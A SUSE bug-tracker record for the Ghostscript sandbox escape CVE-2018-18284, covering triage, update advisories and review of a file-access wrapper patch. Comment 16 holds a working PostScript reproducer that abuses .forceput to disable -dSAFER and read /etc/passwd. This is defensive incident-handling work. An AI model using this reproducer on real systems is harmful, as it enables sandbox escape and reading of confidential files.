Bug 1112229 - (CVE-2018-18284) VUL-0: CVE-2018-18284: ghostscript,ghostscript-library: 1Policy operator gives access to .forceput
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other Other
Importance: P3 - Medium Major
Target Milestone: ---
Assigned To: Security Team bot
https://smash.suse.de/issue/216693/
CVSSv3:SUSE:CVE-2018-18284:8.1:(AV:N...
Depends on:
Blocks:
Reported: 2018-10-17 15:49 UTC by Robert Frohl
Modified: 2020-06-16 22:09 UTC (History)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
ghostscript-wrapper.patch --- initial patch (5.71 KB, text/plain), 2019-07-22 11:22 UTC, Dr. Werner Fink
ghostscript-wrapper.patch --- final patch (12.19 KB, text/plain), 2019-07-23 13:12 UTC, Dr. Werner Fink
ghostscript-wrapper.patch --- final patch (13.03 KB, text/plain), 2019-07-23 14:24 UTC, Dr. Werner Fink
ghostscript-wrapper.patch --- finishing (13.18 KB, text/plain), 2019-07-24 06:26 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- more polishing, that is let HOME dir code work (14.95 KB, text/plain), 2019-07-24 09:26 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- forbid execvp(3) as well (16.09 KB, text/plain), 2019-07-24 12:34 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (16.35 KB, text/plain), 2019-07-24 14:09 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (18.74 KB, text/plain), 2019-07-25 08:06 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (20.26 KB, patch), 2019-07-25 10:51 UTC, Dr. Werner Fink
blktrace.log (317.61 KB, text/plain), 2019-07-25 11:26 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (22.05 KB, text/plain), 2019-07-26 07:47 UTC, Dr. Werner Fink
ghostscript-wrapper.patch -- now with readme above the patch (24.48 KB, text/plain), 2019-07-26 11:36 UTC, Dr. Werner Fink

Description Robert Frohl 2018-10-17 15:49:30 UTC
CVE-2018-18284, another ghostscript sandbox escape. Because procedures
in postscript are just executable arrays, all system procedures need to be
marked as executeonly, so that users cannot peek at their internals with
array operators.

We have also recently learned that they must be marked as pseudo-operators,
otherwise their contents might leak to error handlers.

That makes sense, unless the procedure itself is dangerous - in that case
it must be hidden.

1Policy is a procedure that was correctly marked as executeonly and made a
pseudo-operator, but was basically just a wrapper around .forceput.

patch:
http://git.ghostscript.com/?p=ghostpdl.git;h=8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18284
http://seclists.org/oss-sec/2018/q4/56
http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-18284.html
Comment 1 Robert Frohl 2018-10-17 15:52:35 UTC
Hi Johannes,
from an initial code review these codestreams are affected:
- SUSE:SLE-15:Update/ghostscript 
- SUSE:SLE-12:Update/ghostscript 
- SUSE:SLE-11-SP1:Update/ghostscript-library 
- SUSE:SLE-10-SP3:Update/ghostscript-library
Comment 11 Swamp Workflow Management 2018-12-12 17:10:13 UTC
SUSE-SU-2018:4087-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (src):    ghostscript-mini-9.26-3.9.3
SUSE Linux Enterprise Module for Desktop Applications 15 (src):    libspectre-0.2.8-3.4.3
SUSE Linux Enterprise Module for Basesystem 15 (src):    ghostscript-9.26-3.9.4
Comment 12 Swamp Workflow Management 2018-12-12 20:11:34 UTC
SUSE-SU-2018:4090-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE OpenStack Cloud 7 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Enterprise Storage 4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
Comment 13 Swamp Workflow Management 2018-12-15 11:11:31 UTC
openSUSE-SU-2018:4138-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
openSUSE Leap 15.0 (src):    ghostscript-9.26-lp150.2.9.1, ghostscript-mini-9.26-lp150.2.9.1, libspectre-0.2.8-lp150.2.6.2
Comment 14 Swamp Workflow Management 2018-12-15 11:14:57 UTC
openSUSE-SU-2018:4140-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
openSUSE Leap 42.3 (src):    ghostscript-9.26-14.12.1, ghostscript-mini-9.26-14.12.1, libspectre-0.2.7-17.4.2
Comment 15 Swamp Workflow Management 2019-04-27 22:38:40 UTC
SUSE-SU-2018:4090-2: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 16 Alexandros Toptsoglou 2019-05-14 14:41:48 UTC
Reproducer tested in SLE11 

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)
GS>
Comment 34 Johannes Segitz 2019-07-17 13:34:23 UTC
I've had a look at the wrapper. It's a similar approach I took when I confined quilt with nsjail (https://github.com/jsegitz/squilt). While I think that it's great to have something like this (thank you Werner) we still have the problem that it only protects the use cases that use the wrapper. Since the wrapper doesn't work in all situations we can ship it as a drop in replacement. 

AA has the advantage, that it can confine binaries without their cooperation, but there we quickly found that we either have a very limited effect or it breaks use cases.
Comment 37 Dr. Werner Fink 2019-07-17 13:47:50 UTC
(In reply to Johannes Segitz from comment #34)
> I've had a look at the wrapper. It's a similar approach I took when I
> confined quilt with nsjail (https://github.com/jsegitz/squilt). While I
> think that it's great to have something like this (thank you Werner) we
> still have the problem that it only protects the use cases that use the
> wrapper. Since the wrapper doesn't work in all situations we can ship it as
> a drop in replacement. 
> 
> AA has the advantage, that it can confine binaries without their
> cooperation, but there we quickly found that we either have a very limited
> effect or it breaks use cases.

At last but not least printing as well as tools like gv do work ... only on SLE11-SP3/4 the bwrap utility has to be suid root as otherwise normal users are not allowed to do anything.

I've tried several devices including no one (default X11) as well as x11alpha ... what does not work are %pipe% as well as X11 DISPLAY over ssh or remote network.
Comment 44 Dr. Werner Fink 2019-07-22 11:22:30 UTC
Created attachment 811175 [details]
ghostscript-wrapper.patch --- initial patch

Here we go ... any opinion on this approach?

(In reply to Dr. Werner Fink from comment #42)
>  nm -D /usr/lib64/libgs.so.8.62 | grep -E ' U .*open'
>                  U dlopen
>                  U fdopen
>                  U fopen
>                  U fopen64
>                  U freopen
>                  U iconv_open
>                  U open
>                  U opendir
>                  U popen
> 
> 
> ... if we overload (at compile or link time) the functions
> fopen/fopen64/freopen/open/opendir with replacements which uses a whitelist
> of directories and files which are allowd to be read and maybe as well as
> the file specified to be written we could then forbid all other cases.  OK
> this will cause trouble and some big reports but this seem to be the poor
> man's container even on SLES 10.
> 
> Don't know if this works, overloading libraries was a method I used some
> years back with Netscape closed binary, but as we have the source in GPLv2
> it could be also done by redefining the standard stdio.h//fcntl.h functions
> ... also with fopencookie(3) there is a way to impelement a filter within
> stdio ... for open only the redefining would help.
Comment 45 Dr. Werner Fink 2019-07-23 13:12:13 UTC
Created attachment 811319 [details]
ghostscript-wrapper.patch --- final patch

Any comments? Please speak up even if the code is clear!
Comment 46 Dr. Werner Fink 2019-07-23 14:24:28 UTC
Created attachment 811333 [details]
ghostscript-wrapper.patch --- final patch

Added stat(2) system call to check file type if any
Comment 47 Dr. Werner Fink 2019-07-24 06:26:52 UTC
Created attachment 811387 [details]
ghostscript-wrapper.patch --- finishing

Simplify opendir access by using O_DIRECTORY
Comment 48 Dr. Werner Fink 2019-07-24 09:26:48 UTC
Created attachment 811414 [details]
ghostscript-wrapper.patch -- more polishing, that is let HOME dir code work

Now the patch uses a file /etc/ghostscript/forbidden which may include more than the sub directories .ssh and .gnupg below $HOME ... note that $HOME should be included in this file
Comment 49 Johannes Segitz 2019-07-24 11:20:00 UTC
(In reply to Dr. Werner Fink from comment #48)
I'm just going through the patch. I think it's a rather elegant solution to the problem. This of course has some limitations (e.g. some scenarios will not work and it doesn't protect against exploits that bring shellcode that doesn't go through the hooked functions). It might make sense to look at seccomp/other containment mechanisms in a second step to harden against this.

I'll continue to play around with this. One first thing I spotted: You leak memory by not freeing path 
+    path = realpath(dir, NULL);
this is never freed.
Comment 50 Dr. Werner Fink 2019-07-24 11:27:40 UTC
(In reply to Johannes Segitz from comment #49)

> I'll continue to play around with this. One first thing I spotted: You leak
> memory by not freeing path 
> +    path = realpath(dir, NULL);
> this is never freed.

It is freed by the defined qualifier cleanup_q

 static inline void freep(void *p) { free(*(void**) p); }
 #define cleanup_q __attribute__ ((__cleanup__ (freep)))
Comment 51 Dr. Werner Fink 2019-07-24 11:32:46 UTC
(In reply to Johannes Segitz from comment #49)
> (In reply to Dr. Werner Fink from comment #48)
> I'm just going through the patch. I think it's a rather elegant solution to
> the problem. This of course has some limitations (e.g. some scenarios will
> not work and it doesn't protect against exploits that bring shellcode that
> doesn't go through the hooked functions. It might make sense to look at
> seccomp/other containment mechanism in a second step to harden against this.

Hmmm ... shell code, we could overload system() as well but I do not see where libgs does include this libc call? I see execvp() and we can also overload this function as well.
Comment 52 Dr. Werner Fink 2019-07-24 11:39:08 UTC
(In reply to Dr. Werner Fink from comment #50)
> (In reply to Johannes Segitz from comment #49)
> 
> > I'll continue to play around with this. One first thing I spotted: You leak
> > memory by not freeing path 
> > +    path = realpath(dir, NULL);
> > this is never freed.
> 
> It is freed by the defined qualifier cleanup_q
> 
>  static inline void freep(void *p) { free(*(void**) p); }
>  #define cleanup_q __attribute__ ((__cleanup__ (freep)))

You see this if you free() path at the end without setting it to NULL as you then catch a SIGSEGV due double free() ;)
Comment 53 Dr. Werner Fink 2019-07-24 12:24:38 UTC
I see the execvp is in ijs/ijs_exec_server.c ... currently I have

 #if !defined(PACKAGE_NAME)
 extern int  _gswrap_execvp(const char *, char *const []);
 extern inline __attribute__ ((__gnu_inline__)) int execvp(const char *file, char *const argv[])
 {
     return _gswrap_execvp(file, argv);
 }
 #endif

in ijs/unistd_.h, that is, the execvp() will be wrapped in libgs but not in libijs ... the libijs is for hpijs (the HP IJS server for the Ghostscript IJS client driver) ... the question is if we should forbid execvp in libijs as well or if we then break the HP printing IJS client driver
Comment 54 Dr. Werner Fink 2019-07-24 12:34:31 UTC
Created attachment 811446 [details]
ghostscript-wrapper.patch -- forbid execvp(3) as well

Only if the file /etc/ghostscript/unsecure exists execvp(3) is allowed
Comment 58 Johannes Segitz 2019-07-24 13:37:26 UTC
(In reply to Dr. Werner Fink from comment #50)
of course, sorry for the noise, I noticed that during a first reading of the patch, didn't check the declaration properly
Comment 59 Dr. Werner Fink 2019-07-24 14:09:42 UTC
Created attachment 811452 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

Skipped the execvp(3) overload and now overload popen(3) ... for this I remember if the -dSAFER had been set on the command line and if so the popen(3) is not executed at all even if devil PostScript code enables this API.
Comment 60 Dr. Werner Fink 2019-07-25 08:06:21 UTC
Created attachment 811528 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

Now forbid if %pipe% is not used on the command line with -dSAFER but elsewhere, also forbid the deletefile and renamefile operators if -dSAFER is set.  Add sanity check for the OutputFile(s) specified on the command line
Comment 61 Dr. Werner Fink 2019-07-25 10:51:20 UTC
Created attachment 811574 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

Latest version now prints also with (pdf|ps|ps2|eps)write as these devices want to have RDWR instead of WRONLY output files.

I've only three errors with three pdf files and cups as device

 Finished testing nullpage cups epson deskjet ljet4 pxlmono pxlcolor pdfwrite ps2write jpeg pngalpha pnggray pngmono
 Build FAILURE because gs failed for those drivers and example_files:
 FAILURE for cups with /usr/share/doc/packages/blktrace/blktrace.pdf
 FAILURE for cups with /usr/share/doc/packages/scout/scout.pdf
 FAILURE for cups with /usr/share/doc/packages/yast2-instserver/network-install.pdf

no idea what goes wrong here?
Comment 62 Dr. Werner Fink 2019-07-25 11:06:32 UTC
This is what I see ... Last OS error 2 is ENOENT (No such file or directory)

Error: /rangecheck in .installpagedevice
Operand stack:
   --nostringval--   --nostringval--   --dict:107/126(ro)(L)--   --nostringval--
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1921   1   3   %oparray_pop   1
920   1   3   %oparray_pop   1904   1   3   %oparray_pop   --nostringval--   --nostringval--   1850   2   4   %oparray_pop   --nostringval--   1834   2   4   %oparray_pop   --nostringval--   --nostringval--
Dictionary stack:
   --dict:1170/3371(ro)(G)--   --dict:1/20(G)--   --dict:70/200(L)--   --dict:70/200(L)--
Current allocation mode is local
Last OS error: 2
GPL Ghostscript 8.62: Unrecoverable error, exit code 1
DEBUG2: cups_close(0x1aa6278)
Comment 63 Dr. Werner Fink 2019-07-25 11:13:24 UTC
Looks like cups device is looking for Halftone/Default below all accessible directories ... ???
Comment 64 Dr. Werner Fink 2019-07-25 11:26:04 UTC
Created attachment 811579 [details]
blktrace.log

The result of

gs -q -r50 -dNOPAUSE -dBATCH -sOutputFile=/dev/null -sDEVICE=cups blktrace.pdf
Comment 65 Dr. Werner Fink 2019-07-25 11:50:54 UTC
AFAICS ghostscript opens the device 

open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4


and writes with success ... but then it tries to do a 20th page which is not there ... on Tumbleweed this works up to page 19 but no page 20 is mentioned

fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff57beab000
write(1, "Error: /rangecheck", 18Error: /rangecheck)      = 18
write(1, " in .installpagedevice", 22 in .installpagedevice)  = 22

... fd 1 is the terminal aka stdout
Comment 66 Dr. Werner Fink 2019-07-25 15:38:22 UTC
also it looks like there is a routine which opens the Cmap directory as a regular file but allowing this makes no difference ... next is to compile the stuff with my patch disabled
Comment 67 Dr. Werner Fink 2019-07-25 15:42:49 UTC
The cups device crashes also without my patch on those three files!
Comment 68 Johannes Segitz 2019-07-26 07:06:44 UTC
I played with the wrapper a bit and think with the limits on popen this is a good approach. Since these files you found aren't a regression I would vote for sending this to QA for a test while you're away. 

Long term we'll have to monitor the exploits that come out for ghostscript and check if something is missing here that we can add without breakage.
Comment 69 Dr. Werner Fink 2019-07-26 07:47:06 UTC
Created attachment 811712 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

(In reply to Johannes Segitz from comment #68)
> I played with the wrapper a bit and think with the limits on popen this is a
> good approach. Since these files you found aren't a regression I would vote
> for sending this to QA for a test while you're away. 
> 
> Long term we'll have to monitor the exploits that come out for ghostscript
> and check if something is missing here that we can add without breakage.

Yep ... just harden it a bit, that is now I enforce SAFER exactly at the point where the system PostScript init files are done. Also allow O_WRONLY for pdfwrite and Co. device drivers as otherwise various scripts like pdf2ps might fail.

With the new remember_init() all PostScript code later seen might include foreign code ... beside layout like landscape.ps and fonts from the system.  The command line of pdf2ps looks like

gs q -dNOPAUSE -dBATCH -P- -dSAFER -sDEVICE=ps2write -sOutputFile=<out>.ps -c save pop -f <in>.pdf

and here not O_RDWR but O_WRONLY is used as I had tested
Comment 70 Dr. Werner Fink 2019-07-26 11:36:24 UTC
Created attachment 811755 [details]
ghostscript-wrapper.patch -- now with readme above the patch

<cite>
From: Werner Fink <werner@suse.de>
Date: Fri, 26 Jul 2019 12:54:12 +0200
Subject: Workaround various attack vectors in ghostscript of regaining permissions

First note: This patch does NOT port the real upstream fixes done for ghostscript 9.27
below its License AGPLv3 (GNU Affero General Public License) back to ghostscript 8.62
below GPLv2 (GNU General Public License) as such ports can not be distributed with
the GPLv2 anymore.

This patch is a workaround which uses the libc API functions opendir(3), open64(2),
open(2), fopen64(3), fopen(3), and popen(3) to enwrap those API functions with
enhanced checks.  Those checks include file locations to allow or forbid reading
and/or writing those files.  To make this work with the ghostscript option -dSAFER
the program options in the array of argument strings passed to e.g. ghostscript
in the API libgs function gs_main_init_with_args() and also after the main
initializing PostScript[tm] files are executed by the ghostscript command interpreter
within the API libgs function gs_run_init_file().

This allows that the interfaces %pipe% as well as the "deletefile" and "renamefile"
operators can not be used or modified with the ghostscript option -dSAFER.

The read permission for files are only given below the official localizations

       /etc/fonts
       /etc/ghostscript
       /usr/lib/ghostscript
       /usr/lib64/ghostscript
       /usr/share/ghostscript
       /usr/share/fonts
       /var/cache/fontconfig

as well as in the paths specified in the environment variables

       GS_LIB_DEFAULT
       GS_LIB
       GS_FONTPATH

which implies that below those specified paths no confidential data should
be stored.  Beside this there are confidential sub directories below the users
$HOME directory:

      .ssh
      .gnupg

which are not accessible anymore.  On need the system administrator can specify
more sub directories without any leading $HOME prefix in the configuration file

      /etc/ghostscript/forbidden

One last step further is that ghostscript can only write to the following special
device files

      /dev/null
      /dev/zero
      /dev/lp*      where * means /dev/lp0, /dev/lp1, ...
      /dev/usb/lp*  where * means /dev/usb/lp0, /dev/usb/lp1, ...

It should be noted, that all paths for the file locations are expanded by the
libc API function realpath(3) therefore even symbolic links are expanded to
the real location.  This means, e.g. that links below the official localizations
can not be read.
</cite>
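The path policy the readme above describes, written out as an added C illustration; this is not the code of ghostscript-wrapper.patch, and the function names, the gs_policy struct, the demo values (/home/alice, /tmp/out.ps, /opt/gs-lib) and the exact rules are assumptions drawn from the readme text. It judges a path that the caller has already resolved with realpath(3), and decides reads against the allowed roots, writes against the output file and the device list, and popen(3) against -dSAFER.

```c
#include <fcntl.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Directories below which reading is permitted (the list in the readme). */
static const char *const read_roots[] = {
    "/etc/fonts", "/etc/ghostscript", "/usr/lib/ghostscript",
    "/usr/lib64/ghostscript", "/usr/share/ghostscript",
    "/usr/share/fonts", "/var/cache/fontconfig", NULL
};
/* $HOME sub directories that must never be opened (the readme defaults). */
static const char *const forbidden_home[] = { ".ssh", ".gnupg", NULL };
/* The only special files ghostscript may write to, besides its output file. */
static const char *const write_devices[] = { "/dev/null", "/dev/zero", NULL };
static const char *const write_device_prefixes[] = { "/dev/lp", "/dev/usb/lp", NULL };
/* True if path equals dir or lies below it (whole components, not a string prefix). */
static bool below(const char *path, const char *dir)
{
    size_t n = strlen(dir);
    return strncmp(path, dir, n) == 0 && (path[n] == '/' || path[n] == '\0');
}

/* True for prefix followed by one or more decimal digits, e.g. /dev/lp0. */
static bool numbered_device(const char *path, const char *prefix)
{
    size_t n = strlen(prefix);
    return strncmp(path, prefix, n) == 0 && path[n] != '\0' &&
           strspn(path + n, "0123456789") == strlen(path + n);
}
struct gs_policy {
    bool safer;                   /* -dSAFER was seen on the command line */
    const char *home;             /* canonical $HOME, or NULL */
    const char *output_file;      /* canonical -sOutputFile, or NULL */
    const char *const *lib_paths; /* canonical GS_LIB/GS_FONTPATH dirs, NULL-terminated */
};

/* May an already realpath(3)-resolved path be opened with these open(2) flags? */
bool gs_policy_allows(const struct gs_policy *pol, const char *canon, int flags)
{
    /* Forbidden $HOME sub directories lose in every case, read or write. */
    if (pol->home && below(canon, pol->home) && canon[strlen(pol->home)] == '/') {
        const char *rel = canon + strlen(pol->home) + 1;  /* path relative to $HOME */
        for (const char *const *f = forbidden_home; *f; f++)
            if (below(rel, *f))
                return false;
    }
    if ((flags & O_ACCMODE) == O_RDONLY) {
        for (const char *const *r = read_roots; *r; r++)
            if (below(canon, *r))
                return true;
        for (const char *const *r = pol->lib_paths; r && *r; r++)
            if (below(canon, *r))
                return true;
        return false;
    }
    /* Writing (WRONLY, or RDWR for pdfwrite and friends): only the output file or a device. */
    if (pol->output_file && strcmp(canon, pol->output_file) == 0)
        return true;
    for (const char *const *d = write_devices; *d; d++)
        if (strcmp(canon, *d) == 0)
            return true;
    for (const char *const *d = write_device_prefixes; *d; d++)
        if (numbered_device(canon, *d))
            return true;
    return false;
}
/* popen(3) stays forbidden once -dSAFER was seen, whatever PostScript code later asks. */
bool gs_policy_allows_popen(const struct gs_policy *pol)
{
    return !pol->safer;
}
/* Constructed policy for a self-check (every value here is hypothetical). */
static const char *const demo_lib[] = { "/opt/gs-lib", NULL };
static const struct gs_policy demo_policy = { true, "/home/alice", "/tmp/out.ps", demo_lib };
bool demo_check(const char *canon, int flags)
{
    return gs_policy_allows(&demo_policy, canon, flags);
}
```

A real wrapper would call realpath(3) on the requested name before gs_policy_allows(), which is why "/usr/share/fontsX" is rejected while a symlink inside /usr/share/fonts that points elsewhere is judged by its target.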
Comment 71 Enzo Matsumiya 2019-08-08 16:54:32 UTC
Hi. Any preliminary results testing this wrapper?
Comment 72 Dr. Werner Fink 2019-08-13 06:34:04 UTC
(In reply to Enzo Matsumiya from comment #71)
> Hi. Any preliminary results testing this wrapper?

I've no information as I was two weeks on vacation.  Johannes from the security team might have tested it out meanwhile.

My own test two weeks ago had shown that opening files not belonging to ghostscript nor fonts is not possible from attacking PostScript code even with re-enabled and/or misused system operators for opening files, simply because the underlying C routines from libgs do not allow such access anymore.  Also opening new pipes is forbidden in the C routines of libgs.
Comment 73 Johannes Segitz 2019-08-13 06:39:38 UTC
I looked at it from a security POV (and didn't see functionality issues, but I didn't try to provoke them). I would suggest that you submit this and we put it in an incident and have QA do an intensive test on this. Bringing in Alex as he's the current UM
Comment 74 Dr. Werner Fink 2019-08-13 12:14:14 UTC
(In reply to Johannes Segitz from comment #73)
> I looked at it from a security POV (and didn't see functionality issues, but
> I didn't try to provoke them). I would suggest that you submit this and we
> put it in an incident and have QA do an intensive test on this. Bringing in
> Alex as he's the current UM

See SR#198756 ... this one does fix MORE than this bug! Also the tester should be aware that the patch ghostscript-wrapper.patch does NOT fix the interpreter, that is it does e.g. NOT forbid the access to the .forceput operator. Indeed backporting those fixes would violate the AGPLv3 license conditions.

This patch DOES catch any misused operator later if it is used to a) open files from within a Postscript file which are not fonts or ghostscript initial Postscript files and b) does not allow that the %pipe% macro is rewritten nor set.
Comment 75 Dr. Werner Fink 2019-08-13 12:20:28 UTC
(In reply to Dr. Werner Fink from comment #74)
> (In reply to Johannes Segitz from comment #73)
> > I looked at it from a security POV (and didn't see functionality issues, but
> > I didn't try to provoke them). I would suggest that you submit this and we
> > put it in an incident and have QA do an intensive test on this. Bringing in
> > Alex as he's the current UM
> 
> See SR#198756 ... this one does fix MORE than this bug! Also the tester
[...]
SR#198757 ... that is remove doubled change set of src/imain.c
Comment 76 Dr. Werner Fink 2019-08-26 12:12:25 UTC
Are there any news, that is, is there a method with -dSAFER to misuse the accessible PostScript operators like .forceput to e.g. read files which should not be readable?  Or is it possible to set or overwrite the %pipe% tag?
Comment 77 Dr. Werner Fink 2019-09-16 11:34:17 UTC
Part of gs 9.27
Comment 78 Dr. Werner Fink 2019-09-17 10:25:55 UTC
Alexander? Do you have any news?
Comment 85 Marcus Meissner 2020-01-28 07:23:20 UTC
solved for SLE11 with the wrapper, SLE12 and SLE15 fixed by version updates.